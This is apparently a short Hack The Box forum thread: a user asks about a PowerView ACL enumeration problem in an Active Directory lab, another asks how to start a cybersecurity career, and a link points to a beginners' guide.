hey everybody, for the last question of this section : https://academy.hackthebox.com/module/143/section/1485
I can't find the ACE even though I converted the SID correctly and executed the Get-DomainObjectACL command with PowerView, but it doesn't list the object (for the forend user)
I chose a different route to get that information also explained in that section
Hello everyone, I would like to ask a question. I want to become a Cyber Security specialist, I have now graduated from school in Russia and want to enter a university, but the knowledge that the university will give is most likely not sufficient to reach the top. What is better to study and where to practice your skills? I will be grateful for your answer.
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible